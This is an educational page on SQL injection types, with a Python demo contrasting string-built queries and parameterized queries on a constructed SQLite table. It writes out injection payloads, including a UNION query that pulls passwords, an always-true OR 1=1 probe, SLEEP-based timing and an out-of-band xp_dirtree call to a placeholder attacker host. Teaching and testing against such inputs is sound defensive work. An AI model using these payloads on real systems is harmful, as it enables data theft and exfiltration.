What is SQL Injection?
SQL injection is a vulnerability in which untrusted input is incorporated into a database query, allowing attackers to execute malicious queries against the database and retrieve sensitive data.
What are the types of SQL Injection?
In-band :
- Error-based : occurs when the attacker manipulates the query in such a way that the database returns error messages that can reveal information about the database structure. This technique often helps identify vulnerabilities, such as table names or column information, that can be exploited further.
- Example: Injecting something like UNION SELECT 1,2,3 -- might cause an error that reveals internal database details.
Union-based :
- the attacker uses the UNION operator to combine the results of two or more SQL queries. This technique allows attackers to retrieve data from additional tables by appending a malicious query.
- Example: Injecting UNION SELECT username, password FROM users -- can append a query to fetch usernames and passwords.
Blind :
- Boolean-Based: involves sending queries that return true or false based on the injected SQL logic. The attacker can infer whether certain queries are true by observing how the web application behaves (e.g., different error messages, page loading times).
- Example: Injecting 1 OR 1=1 will always return true, while 1 AND 1=2 will return false, allowing the attacker to deduce sensitive information based on the responses.
- Time-based : the attacker causes the database to delay its response by executing a time-intensive operation (e.g., the SLEEP() function in MySQL). If the response is delayed, it confirms the SQL injection vulnerability.
- Example: Injecting SLEEP(5) in a query would cause the server to delay its response by 5 seconds, confirming the injection.
Out-of-band :
- occurs when the attacker triggers a database operation that communicates with an external server (e.g., sending data via DNS or HTTP requests). This technique is used when there is no immediate response from the server or the server doesn't return error messages.
- Example: Injecting a payload that triggers a DNS query, such as SELECT * FROM users; xp_dirtree('\\\\evil.com\\share'), sends data to the attacker's server.
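The in-band and Boolean-based cases above, shown as an added example (not from the original page): the same inputs are run against a string-concatenated query and against its parameterized replacement on a constructed in-memory SQLite table, so the difference in behaviour, and the fix, is visible. SLEEP() and out-of-band channels are not shown because SQLite has neither.

```python
import sqlite3

# Constructed sample data (assumed, not from the page): a tiny users table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn

def lookup_vulnerable(conn, username):
    # Vulnerable pattern: the input is spliced into the SQL text, so quotes,
    # OR, UNION and -- in the input are parsed as SQL, not as a name.
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, username):
    # Hardened pattern: a bound parameter is always treated as a string value,
    # whatever characters it contains; the query structure cannot change.
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def run_vulnerable(conn, username):
    """Mimic an application that leaks database errors to the client.
    Returns ('rows', list) or ('error', message)."""
    try:
        return ("rows", lookup_vulnerable(conn, username))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    probes = [
        "alice",                                       # legitimate input
        "'",                                           # error-based: syntax error
        "' OR 1=1 --",                                 # boolean-based: always true
        "' UNION SELECT id, password FROM users --",   # union-based: extra table
    ]
    for p in probes:
        print(repr(p))
        print("  vulnerable:", run_vulnerable(db, p))
        print("  safe      :", lookup_safe(db, p))
```

For every probe except the legitimate name the safe version returns no rows and raises nothing, which is the observable property a code review or test suite should check for.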